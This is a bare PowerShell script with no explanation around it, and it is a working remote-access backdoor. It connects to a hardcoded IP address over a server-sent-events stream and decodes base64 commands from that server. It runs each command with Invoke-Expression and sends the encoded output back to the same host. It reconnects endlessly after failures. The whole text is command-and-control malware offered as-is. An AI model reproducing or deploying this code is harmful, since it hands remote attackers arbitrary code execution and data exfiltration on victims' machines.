$sseUri = "http://222.108.147.76:32105/stream";
$postUri = "http://222.108.147.76:32105/post";
[System.Net.ServicePointManager]::Expect100Continue = $false;
while($true){try{$request= [System.Net.WebRequest]::Create($sseUri);
$postUri = "http://222.108.147.76:32105/post";
$request.Method = "GET";
$request.Accept = "text/event-stream";
$response = $request.GetResponse();
$stream = $response.GetResponseStream();
$reader = New-Object System.IO.StreamReader($stream);
Write-Host "Connected to SSE stream at $sseUri.";
while (-not $reader.EndOfStream) {try {$line = $reader.ReadLine();
if ($line -and $line.StartsWith("data:")) {$msg = $line.Substring(5).Trim();
 Write-Host "received $msg";
 $msg =[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($msg.Substring(3)));
 if ($msg -eq "keep-alive") {Write-Host "Keep-alive received, staying connected...";
continue;
}if (-not [string]::IsNullOrWhiteSpace($msg) -and $msg -ne "0") {Write-Host "SSE message received: $msg";
 try {$output = Invoke-Expression $msg | Out-String;
}catch {$output = $_.Exception.Message;
}$bytes = [System.Text.Encoding]::UTF8.GetBytes($output);
$output = 'CAS'+[System.Convert]::ToBase64String($bytes);
$output = $output.Replace("=", "");
$postBody = "?databack=$output";
try {$postUri = $postUri+$postBody;
$Prequest= [System.Net.WebRequest]::Create($postUri);
$Prequest.Method = "GET";
$Prequest.Accept = "text/event-stream";
$Presponse = $Prequest.GetResponse();
}catch {Write-Warning "Error posting databack to server: $_";
}}}}catch {Write-Warning "Error processing SSE message: $_";
break;
}}}catch {Write-Warning "Error connecting to SSE server: $_";
}finally {if ($reader) { $reader.Close();
 }if($stream){ $stream.Close();
}if ($response){$response.Close();
 }}Write-Host "Reconnecting SSE after failure...";
Start-Sleep -Seconds 5;
}